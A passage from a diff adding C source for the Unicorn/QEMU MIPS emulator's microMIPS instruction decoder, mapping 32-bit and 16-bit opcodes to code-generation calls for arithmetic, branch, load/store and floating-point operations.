FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_S): + mips32_op = OPC_RECIP_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_D): + mips32_op = OPC_RECIP_D; + goto do_unaryfp; + + /* Floor */ + case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_S): + mips32_op = OPC_FLOOR_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_D): + mips32_op = OPC_FLOOR_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_S): + mips32_op = OPC_FLOOR_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_D): + mips32_op = OPC_FLOOR_W_D; + goto do_unaryfp; + + /* Ceiling 
*/ + case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_S): + mips32_op = OPC_CEIL_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_D): + mips32_op = OPC_CEIL_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_S): + mips32_op = OPC_CEIL_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_D): + mips32_op = OPC_CEIL_W_D; + goto do_unaryfp; + + /* Truncation */ + case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_S): + mips32_op = OPC_TRUNC_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_D): + mips32_op = OPC_TRUNC_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_S): + mips32_op = OPC_TRUNC_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_D): + mips32_op = OPC_TRUNC_W_D; + goto do_unaryfp; + + /* Round */ + case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_S): + mips32_op = OPC_ROUND_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_D): + mips32_op = OPC_ROUND_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_S): + mips32_op = OPC_ROUND_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_D): + mips32_op = OPC_ROUND_W_D; + goto do_unaryfp; + + /* Integer to floating-point conversion */ + case FLOAT_1BIT_FMT(CVT_L, FMT_SD_S): + mips32_op = OPC_CVT_L_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_L, FMT_SD_D): + mips32_op = OPC_CVT_L_D; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_W, FMT_SD_S): + mips32_op = OPC_CVT_W_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_W, FMT_SD_D): + mips32_op = OPC_CVT_W_D; + goto do_unaryfp; + + /* Paired-foo conversions */ + case FLOAT_1BIT_FMT(CVT_S_PL, 0): + mips32_op = OPC_CVT_S_PL; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_S_PU, 0): + mips32_op = OPC_CVT_S_PU; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_PW_PS, 0): + mips32_op = OPC_CVT_PW_PS; + goto do_unaryfp; + case FLOAT_1BIT_FMT(CVT_PS_PW, 0): + mips32_op = OPC_CVT_PS_PW; + goto do_unaryfp; + + /* Floating-point moves */ + case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_S): + mips32_op = OPC_MOV_S; + goto do_unaryfp; + case 
FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_D): + mips32_op = OPC_MOV_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_PS): + mips32_op = OPC_MOV_PS; + goto do_unaryfp; + + /* Absolute value */ + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_S): + mips32_op = OPC_ABS_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_D): + mips32_op = OPC_ABS_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_PS): + mips32_op = OPC_ABS_PS; + goto do_unaryfp; + + /* Negation */ + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_S): + mips32_op = OPC_NEG_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_D): + mips32_op = OPC_NEG_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_PS): + mips32_op = OPC_NEG_PS; + goto do_unaryfp; + + /* Reciprocal square root step */ + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_S): + mips32_op = OPC_RSQRT1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_D): + mips32_op = OPC_RSQRT1_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_PS): + mips32_op = OPC_RSQRT1_PS; + goto do_unaryfp; + + /* Reciprocal step */ + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_S): + mips32_op = OPC_RECIP1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_D): + mips32_op = OPC_RECIP1_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_PS): + mips32_op = OPC_RECIP1_PS; + goto do_unaryfp; + + /* Conversions from double */ + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_S): + mips32_op = OPC_CVT_D_S; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_W): + mips32_op = OPC_CVT_D_W; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_L): + mips32_op = OPC_CVT_D_L; + goto do_unaryfp; + + /* Conversions from single */ + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_D): + mips32_op = OPC_CVT_S_D; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_W): + mips32_op = OPC_CVT_S_W; + goto do_unaryfp; + case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_L): + mips32_op = OPC_CVT_S_L; + do_unaryfp: + gen_farith(ctx, mips32_op, -1, 
rs, rt, 0); + break; + + /* Conditional moves on floating-point codes */ + case COND_FLOAT_MOV(MOVT, 0): + case COND_FLOAT_MOV(MOVT, 1): + case COND_FLOAT_MOV(MOVT, 2): + case COND_FLOAT_MOV(MOVT, 3): + case COND_FLOAT_MOV(MOVT, 4): + case COND_FLOAT_MOV(MOVT, 5): + case COND_FLOAT_MOV(MOVT, 6): + case COND_FLOAT_MOV(MOVT, 7): + gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 1); + break; + case COND_FLOAT_MOV(MOVF, 0): + case COND_FLOAT_MOV(MOVF, 1): + case COND_FLOAT_MOV(MOVF, 2): + case COND_FLOAT_MOV(MOVF, 3): + case COND_FLOAT_MOV(MOVF, 4): + case COND_FLOAT_MOV(MOVF, 5): + case COND_FLOAT_MOV(MOVF, 6): + case COND_FLOAT_MOV(MOVF, 7): + gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 0); + break; + default: + MIPS_INVAL("pool32fxf"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_micromips32_opc (CPUMIPSState *env, DisasContext *ctx, + uint16_t insn_hw1) +{ + int32_t offset; + uint16_t insn; + int rt, rs, rd, rr; + int16_t imm; + uint32_t op, minor, mips32_op; + uint32_t cond, fmt, cc; + + insn = cpu_lduw_code(env, ctx->pc + 2); + ctx->opcode = (ctx->opcode << 16) | insn; + + rt = (ctx->opcode >> 21) & 0x1f; + rs = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + rr = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t) ctx->opcode; + + op = (ctx->opcode >> 26) & 0x3f; + switch (op) { + case POOL32A: + minor = ctx->opcode & 0x3f; + switch (minor) { + case 0x00: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + case SLL32: + mips32_op = OPC_SLL; + goto do_shifti; + case SRA: + mips32_op = OPC_SRA; + goto do_shifti; + case SRL32: + mips32_op = OPC_SRL; + goto do_shifti; + case ROTR: + mips32_op = OPC_ROTR; + do_shifti: + gen_shift_imm(ctx, mips32_op, rt, rs, rd); + break; + default: + goto pool32a_invalid; + } + break; + case 0x10: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + /* Arithmetic */ + case ADD: + mips32_op = OPC_ADD; + goto do_arith; + case ADDU32: + mips32_op = OPC_ADDU; + goto do_arith; + case 
SUB: + mips32_op = OPC_SUB; + goto do_arith; + case SUBU32: + mips32_op = OPC_SUBU; + goto do_arith; + case MUL: + mips32_op = OPC_MUL; + do_arith: + gen_arith(ctx, mips32_op, rd, rs, rt); + break; + /* Shifts */ + case SLLV: + mips32_op = OPC_SLLV; + goto do_shift; + case SRLV: + mips32_op = OPC_SRLV; + goto do_shift; + case SRAV: + mips32_op = OPC_SRAV; + goto do_shift; + case ROTRV: + mips32_op = OPC_ROTRV; + do_shift: + gen_shift(ctx, mips32_op, rd, rs, rt); + break; + /* Logical operations */ + case AND: + mips32_op = OPC_AND; + goto do_logic; + case OR32: + mips32_op = OPC_OR; + goto do_logic; + case NOR: + mips32_op = OPC_NOR; + goto do_logic; + case XOR32: + mips32_op = OPC_XOR; + do_logic: + gen_logic(ctx, mips32_op, rd, rs, rt); + break; + /* Set less than */ + case SLT: + mips32_op = OPC_SLT; + goto do_slt; + case SLTU: + mips32_op = OPC_SLTU; + do_slt: + gen_slt(ctx, mips32_op, rd, rs, rt); + break; + default: + goto pool32a_invalid; + } + break; + case 0x18: + minor = (ctx->opcode >> 6) & 0xf; + switch (minor) { + /* Conditional moves */ + case MOVN: + mips32_op = OPC_MOVN; + goto do_cmov; + case MOVZ: + mips32_op = OPC_MOVZ; + do_cmov: + gen_cond_move(ctx, mips32_op, rd, rs, rt); + break; + case LWXS: + gen_ldxs(ctx, rs, rt, rd); + break; + default: + goto pool32a_invalid; + } + break; + case INS: + gen_bitops(ctx, OPC_INS, rt, rs, rr, rd); + return; + case EXT: + gen_bitops(ctx, OPC_EXT, rt, rs, rr, rd); + return; + case POOL32AXF: + gen_pool32axf(env, ctx, rt, rs); + break; + case 0x07: + generate_exception(ctx, EXCP_BREAK); + break; + default: + pool32a_invalid: + MIPS_INVAL("pool32a"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32B: + minor = (ctx->opcode >> 12) & 0xf; + switch (minor) { + case CACHE: + check_cp0_enabled(ctx); + /* Treat as no-op. */ + break; + case LWC2: + case SWC2: + /* COP2: Not implemented. 
*/ + generate_exception_err(ctx, EXCP_CpU, 2); + break; + case LWP: + case SWP: +#ifdef TARGET_MIPS64 + case LDP: + case SDP: +#endif + gen_ldst_pair(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + case LWM32: + case SWM32: +#ifdef TARGET_MIPS64 + case LDM: + case SDM: +#endif + gen_ldst_multiple(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + default: + MIPS_INVAL("pool32b"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32F: + if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { + minor = ctx->opcode & 0x3f; + check_cp1_enabled(ctx); + switch (minor) { + case ALNV_PS: + mips32_op = OPC_ALNV_PS; + goto do_madd; + case MADD_S: + mips32_op = OPC_MADD_S; + goto do_madd; + case MADD_D: + mips32_op = OPC_MADD_D; + goto do_madd; + case MADD_PS: + mips32_op = OPC_MADD_PS; + goto do_madd; + case MSUB_S: + mips32_op = OPC_MSUB_S; + goto do_madd; + case MSUB_D: + mips32_op = OPC_MSUB_D; + goto do_madd; + case MSUB_PS: + mips32_op = OPC_MSUB_PS; + goto do_madd; + case NMADD_S: + mips32_op = OPC_NMADD_S; + goto do_madd; + case NMADD_D: + mips32_op = OPC_NMADD_D; + goto do_madd; + case NMADD_PS: + mips32_op = OPC_NMADD_PS; + goto do_madd; + case NMSUB_S: + mips32_op = OPC_NMSUB_S; + goto do_madd; + case NMSUB_D: + mips32_op = OPC_NMSUB_D; + goto do_madd; + case NMSUB_PS: + mips32_op = OPC_NMSUB_PS; + do_madd: + gen_flt3_arith(ctx, mips32_op, rd, rr, rs, rt); + break; + case CABS_COND_FMT: + cond = (ctx->opcode >> 6) & 0xf; + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 10) & 0x3; + switch (fmt) { + case 0x0: + gen_cmpabs_s(ctx, cond, rt, rs, cc); + break; + case 0x1: + gen_cmpabs_d(ctx, cond, rt, rs, cc); + break; + case 0x2: + gen_cmpabs_ps(ctx, cond, rt, rs, cc); + break; + default: + goto pool32f_invalid; + } + break; + case C_COND_FMT: + cond = (ctx->opcode >> 6) & 0xf; + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 10) & 0x3; + switch (fmt) { + case 0x0: + gen_cmp_s(ctx, cond, rt, rs, cc); + break; + case 0x1: + 
gen_cmp_d(ctx, cond, rt, rs, cc); + break; + case 0x2: + gen_cmp_ps(ctx, cond, rt, rs, cc); + break; + default: + goto pool32f_invalid; + } + break; + case POOL32FXF: + gen_pool32fxf(ctx, rt, rs); + break; + case 0x00: + /* PLL foo */ + switch ((ctx->opcode >> 6) & 0x7) { + case PLL_PS: + mips32_op = OPC_PLL_PS; + goto do_ps; + case PLU_PS: + mips32_op = OPC_PLU_PS; + goto do_ps; + case PUL_PS: + mips32_op = OPC_PUL_PS; + goto do_ps; + case PUU_PS: + mips32_op = OPC_PUU_PS; + goto do_ps; + case CVT_PS_S: + mips32_op = OPC_CVT_PS_S; + do_ps: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + goto pool32f_invalid; + } + break; + case 0x08: + /* [LS][WDU]XC1 */ + switch ((ctx->opcode >> 6) & 0x7) { + case LWXC1: + mips32_op = OPC_LWXC1; + goto do_ldst_cp1; + case SWXC1: + mips32_op = OPC_SWXC1; + goto do_ldst_cp1; + case LDXC1: + mips32_op = OPC_LDXC1; + goto do_ldst_cp1; + case SDXC1: + mips32_op = OPC_SDXC1; + goto do_ldst_cp1; + case LUXC1: + mips32_op = OPC_LUXC1; + goto do_ldst_cp1; + case SUXC1: + mips32_op = OPC_SUXC1; + do_ldst_cp1: + gen_flt3_ldst(ctx, mips32_op, rd, rd, rt, rs); + break; + default: + goto pool32f_invalid; + } + break; + case 0x18: + /* 3D insns */ + fmt = (ctx->opcode >> 9) & 0x3; + switch ((ctx->opcode >> 6) & 0x7) { + case RSQRT2_FMT: + switch (fmt) { + case FMT_SDPS_S: + mips32_op = OPC_RSQRT2_S; + goto do_3d; + case FMT_SDPS_D: + mips32_op = OPC_RSQRT2_D; + goto do_3d; + case FMT_SDPS_PS: + mips32_op = OPC_RSQRT2_PS; + goto do_3d; + default: + goto pool32f_invalid; + } + break; + case RECIP2_FMT: + switch (fmt) { + case FMT_SDPS_S: + mips32_op = OPC_RECIP2_S; + goto do_3d; + case FMT_SDPS_D: + mips32_op = OPC_RECIP2_D; + goto do_3d; + case FMT_SDPS_PS: + mips32_op = OPC_RECIP2_PS; + goto do_3d; + default: + goto pool32f_invalid; + } + break; + case ADDR_PS: + mips32_op = OPC_ADDR_PS; + goto do_3d; + case MULR_PS: + mips32_op = OPC_MULR_PS; + do_3d: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + goto 
pool32f_invalid; + } + break; + case 0x20: + /* MOV[FT].fmt and PREFX */ + cc = (ctx->opcode >> 13) & 0x7; + fmt = (ctx->opcode >> 9) & 0x3; + switch ((ctx->opcode >> 6) & 0x7) { + case MOVF_FMT: + switch (fmt) { + case FMT_SDPS_S: + gen_movcf_s(ctx, rs, rt, cc, 0); + break; + case FMT_SDPS_D: + gen_movcf_d(ctx, rs, rt, cc, 0); + break; + case FMT_SDPS_PS: + gen_movcf_ps(ctx, rs, rt, cc, 0); + break; + default: + goto pool32f_invalid; + } + break; + case MOVT_FMT: + switch (fmt) { + case FMT_SDPS_S: + gen_movcf_s(ctx, rs, rt, cc, 1); + break; + case FMT_SDPS_D: + gen_movcf_d(ctx, rs, rt, cc, 1); + break; + case FMT_SDPS_PS: + gen_movcf_ps(ctx, rs, rt, cc, 1); + break; + default: + goto pool32f_invalid; + } + break; + case PREFX: + break; + default: + goto pool32f_invalid; + } + break; +#define FINSN_3ARG_SDPS(prfx) \ + switch ((ctx->opcode >> 8) & 0x3) { \ + case FMT_SDPS_S: \ + mips32_op = OPC_##prfx##_S; \ + goto do_fpop; \ + case FMT_SDPS_D: \ + mips32_op = OPC_##prfx##_D; \ + goto do_fpop; \ + case FMT_SDPS_PS: \ + mips32_op = OPC_##prfx##_PS; \ + goto do_fpop; \ + default: \ + goto pool32f_invalid; \ + } + case 0x30: + /* regular FP ops */ + switch ((ctx->opcode >> 6) & 0x3) { + case ADD_FMT: + FINSN_3ARG_SDPS(ADD); + break; + case SUB_FMT: + FINSN_3ARG_SDPS(SUB); + break; + case MUL_FMT: + FINSN_3ARG_SDPS(MUL); + break; + case DIV_FMT: + fmt = (ctx->opcode >> 8) & 0x3; + if (fmt == 1) { + mips32_op = OPC_DIV_D; + } else if (fmt == 0) { + mips32_op = OPC_DIV_S; + } else { + goto pool32f_invalid; + } + goto do_fpop; + default: + goto pool32f_invalid; + } + break; + case 0x38: + /* cmovs */ + switch ((ctx->opcode >> 6) & 0x3) { + case MOVN_FMT: + FINSN_3ARG_SDPS(MOVN); + break; + case MOVZ_FMT: + FINSN_3ARG_SDPS(MOVZ); + break; + default: + goto pool32f_invalid; + } + break; + do_fpop: + gen_farith(ctx, mips32_op, rt, rs, rd, 0); + break; + default: + pool32f_invalid: + MIPS_INVAL("pool32f"); + generate_exception(ctx, EXCP_RI); + break; + } + } else { + 
generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case POOL32I: + minor = (ctx->opcode >> 21) & 0x1f; + switch (minor) { + case BLTZ: + gen_compute_branch(ctx, OPC_BLTZ, 4, rs, -1, imm << 1, 4); + break; + case BLTZAL: + gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BLTZALS: + gen_compute_branch(ctx, OPC_BLTZAL, 4, rs, -1, imm << 1, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BGEZ: + gen_compute_branch(ctx, OPC_BGEZ, 4, rs, -1, imm << 1, 4); + break; + case BGEZAL: + gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BGEZALS: + gen_compute_branch(ctx, OPC_BGEZAL, 4, rs, -1, imm << 1, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BLEZ: + gen_compute_branch(ctx, OPC_BLEZ, 4, rs, -1, imm << 1, 4); + break; + case BGTZ: + gen_compute_branch(ctx, OPC_BGTZ, 4, rs, -1, imm << 1, 4); + break; + + /* Traps */ + case TLTI: + mips32_op = OPC_TLTI; + goto do_trapi; + case TGEI: + mips32_op = OPC_TGEI; + goto do_trapi; + case TLTIU: + mips32_op = OPC_TLTIU; + goto do_trapi; + case TGEIU: + mips32_op = OPC_TGEIU; + goto do_trapi; + case TNEI: + mips32_op = OPC_TNEI; + goto do_trapi; + case TEQI: + mips32_op = OPC_TEQI; + do_trapi: + gen_trap(ctx, mips32_op, rs, -1, imm); + break; + + case BNEZC: + case BEQZC: + gen_compute_branch(ctx, minor == BNEZC ? OPC_BNE : OPC_BEQ, + 4, rs, 0, imm << 1, 0); + /* Compact branches don't have a delay slot, so just let + the normal delay slot handling take us to the branch + target. */ + break; + case LUI: + gen_logic_imm(ctx, OPC_LUI, rs, -1, imm); + break; + case SYNCI: + /* Break the TB to be able to sync copied instructions + immediately */ + ctx->bstate = BS_STOP; + break; + case BC2F: + case BC2T: + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + break; + case BC1F: + mips32_op = (ctx->opcode & (1 << 16)) ? 
OPC_BC1FANY2 : OPC_BC1F; + goto do_cp1branch; + case BC1T: + mips32_op = (ctx->opcode & (1 << 16)) ? OPC_BC1TANY2 : OPC_BC1T; + goto do_cp1branch; + case BC1ANY4F: + mips32_op = OPC_BC1FANY4; + goto do_cp1mips3d; + case BC1ANY4T: + mips32_op = OPC_BC1TANY4; + do_cp1mips3d: + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + /* Fall through */ + do_cp1branch: + if (env->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + gen_compute_branch1(ctx, mips32_op, + (ctx->opcode >> 18) & 0x7, imm << 1); + } else { + generate_exception_err(ctx, EXCP_CpU, 1); + } + break; + case BPOSGE64: + case BPOSGE32: + /* MIPS DSP: not implemented */ + /* Fall through */ + default: + MIPS_INVAL("pool32i"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case POOL32C: + minor = (ctx->opcode >> 12) & 0xf; + switch (minor) { + case LWL: + mips32_op = OPC_LWL; + goto do_ld_lr; + case SWL: + mips32_op = OPC_SWL; + goto do_st_lr; + case LWR: + mips32_op = OPC_LWR; + goto do_ld_lr; + case SWR: + mips32_op = OPC_SWR; + goto do_st_lr; +#if defined(TARGET_MIPS64) + case LDL: + mips32_op = OPC_LDL; + goto do_ld_lr; + case SDL: + mips32_op = OPC_SDL; + goto do_st_lr; + case LDR: + mips32_op = OPC_LDR; + goto do_ld_lr; + case SDR: + mips32_op = OPC_SDR; + goto do_st_lr; + case LWU: + mips32_op = OPC_LWU; + goto do_ld_lr; + case LLD: + mips32_op = OPC_LLD; + goto do_ld_lr; +#endif + case LL: + mips32_op = OPC_LL; + goto do_ld_lr; + do_ld_lr: + gen_ld(ctx, mips32_op, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + do_st_lr: + gen_st(ctx, mips32_op, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; + case SC: + gen_st_cond(ctx, OPC_SC, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; +#if defined(TARGET_MIPS64) + case SCD: + gen_st_cond(ctx, OPC_SCD, rt, rs, SIMM(ctx->opcode, 0, 12)); + break; +#endif + case PREF: + /* Treat as no-op */ + break; + default: + MIPS_INVAL("pool32c"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case ADDI32: + mips32_op = OPC_ADDI; + goto do_addi; + 
case ADDIU32: + mips32_op = OPC_ADDIU; + do_addi: + gen_arith_imm(ctx, mips32_op, rt, rs, imm); + break; + + /* Logical operations */ + case ORI32: + mips32_op = OPC_ORI; + goto do_logici; + case XORI32: + mips32_op = OPC_XORI; + goto do_logici; + case ANDI32: + mips32_op = OPC_ANDI; + do_logici: + gen_logic_imm(ctx, mips32_op, rt, rs, imm); + break; + + /* Set less than immediate */ + case SLTI32: + mips32_op = OPC_SLTI; + goto do_slti; + case SLTIU32: + mips32_op = OPC_SLTIU; + do_slti: + gen_slt_imm(ctx, mips32_op, rt, rs, imm); + break; + case JALX32: + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, OPC_JALX, 4, rt, rs, offset, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALS32: + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 1; + gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, offset, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case BEQ32: + gen_compute_branch(ctx, OPC_BEQ, 4, rt, rs, imm << 1, 4); + break; + case BNE32: + gen_compute_branch(ctx, OPC_BNE, 4, rt, rs, imm << 1, 4); + break; + case J32: + gen_compute_branch(ctx, OPC_J, 4, rt, rs, + (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); + break; + case JAL32: + gen_compute_branch(ctx, OPC_JAL, 4, rt, rs, + (int32_t)(ctx->opcode & 0x3FFFFFF) << 1, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + /* Floating point (COP1) */ + case LWC132: + mips32_op = OPC_LWC1; + goto do_cop1; + case LDC132: + mips32_op = OPC_LDC1; + goto do_cop1; + case SWC132: + mips32_op = OPC_SWC1; + goto do_cop1; + case SDC132: + mips32_op = OPC_SDC1; + do_cop1: + gen_cop1_ldst(ctx, mips32_op, rt, rs, imm); + break; + case ADDIUPC: + { + int reg = mmreg(ZIMM(ctx->opcode, 23, 3)); + int offset = SIMM(ctx->opcode, 0, 23) << 2; + + gen_addiupc(ctx, reg, offset, 0, 0); + } + break; + /* Loads and stores */ + case LB32: + mips32_op = OPC_LB; + goto do_ld; + case LBU32: + mips32_op = OPC_LBU; + goto do_ld; + case LH32: + mips32_op = OPC_LH; + goto do_ld; + case LHU32: + mips32_op = 
OPC_LHU; + goto do_ld; + case LW32: + mips32_op = OPC_LW; + goto do_ld; +#ifdef TARGET_MIPS64 + case LD32: + mips32_op = OPC_LD; + goto do_ld; + case SD32: + mips32_op = OPC_SD; + goto do_st; +#endif + case SB32: + mips32_op = OPC_SB; + goto do_st; + case SH32: + mips32_op = OPC_SH; + goto do_st; + case SW32: + mips32_op = OPC_SW; + goto do_st; + do_ld: + gen_ld(ctx, mips32_op, rt, rs, imm); + break; + do_st: + gen_st(ctx, mips32_op, rt, rs, imm); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } +} + +static int decode_micromips_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + uint32_t op; + + /* make sure instructions are on a halfword boundary */ + if (ctx->pc & 0x1) { + env->CP0_BadVAddr = ctx->pc; + generate_exception(ctx, EXCP_AdEL); + ctx->bstate = BS_STOP; + return 2; + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) { + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + op = (ctx->opcode >> 10) & 0x3f; + /* Enforce properly-sized instructions in a delay slot */ + if (ctx->hflags & MIPS_HFLAG_BDS_STRICT) { + switch (op & 0x7) { /* MSB-3..MSB-5 */ + case 0: + /* POOL32A, POOL32B, POOL32I, POOL32C */ + case 4: + /* ADDI32, ADDIU32, ORI32, XORI32, SLTI32, SLTIU32, ANDI32, JALX32 */ + case 5: + /* LBU32, LHU32, POOL32F, JALS32, BEQ32, BNE32, J32, JAL32 */ + case 6: + /* SB32, SH32, ADDIUPC, SWC132, SDC132, SW32 */ + case 7: + /* LB32, LH32, LWC132, LDC132, LW32 */ + if (ctx->hflags & MIPS_HFLAG_BDS16) { + generate_exception(ctx, EXCP_RI); + /* Just stop translation; the user is confused. 
*/ + ctx->bstate = BS_STOP; + return 2; + } + break; + case 1: + /* POOL16A, POOL16B, POOL16C, LWGP16, POOL16F */ + case 2: + /* LBU16, LHU16, LWSP16, LW16, SB16, SH16, SWSP16, SW16 */ + case 3: + /* MOVE16, ANDI16, POOL16D, POOL16E, BEQZ16, BNEZ16, B16, LI16 */ + if (ctx->hflags & MIPS_HFLAG_BDS32) { + generate_exception(ctx, EXCP_RI); + /* Just stop translation; the user is confused. */ + ctx->bstate = BS_STOP; + return 2; + } + break; + } + } + + switch (op) { + case POOL16A: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs1 = mmreg(uMIPS_RS1(ctx->opcode)); + int rs2 = mmreg(uMIPS_RS2(ctx->opcode)); + uint32_t opc = 0; + + switch (ctx->opcode & 0x1) { + case ADDU16: + opc = OPC_ADDU; + break; + case SUBU16: + opc = OPC_SUBU; + break; + } + + gen_arith(ctx, opc, rd, rs1, rs2); + } + break; + case POOL16B: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + int amount = (ctx->opcode >> 1) & 0x7; + uint32_t opc = 0; + amount = amount == 0 ? 8 : amount; + + switch (ctx->opcode & 0x1) { + case SLL16: + opc = OPC_SLL; + break; + case SRL16: + opc = OPC_SRL; + break; + } + + gen_shift_imm(ctx, opc, rd, rs, amount); + } + break; + case POOL16C: + gen_pool16c_insn(ctx); + break; + case LWGP16: + { + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rb = 28; /* GP */ + int16_t offset = SIMM(ctx->opcode, 0, 7) << 2; + + gen_ld(ctx, OPC_LW, rd, rb, offset); + } + break; + case POOL16F: + if (ctx->opcode & 1) { + generate_exception(ctx, EXCP_RI); + } else { + /* MOVEP */ + int enc_dest = uMIPS_RD(ctx->opcode); + int enc_rt = uMIPS_RS2(ctx->opcode); + int enc_rs = uMIPS_RS1(ctx->opcode); + int rd, rs, re, rt; + static const int rd_enc[] = { 5, 5, 6, 4, 4, 4, 4, 4 }; + static const int re_enc[] = { 6, 7, 7, 21, 22, 5, 6, 7 }; + static const int rs_rt_enc[] = { 0, 17, 2, 3, 16, 18, 19, 20 }; + + rd = rd_enc[enc_dest]; + re = re_enc[enc_dest]; + rs = rs_rt_enc[enc_rs]; + rt = rs_rt_enc[enc_rt]; + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, 0); + 
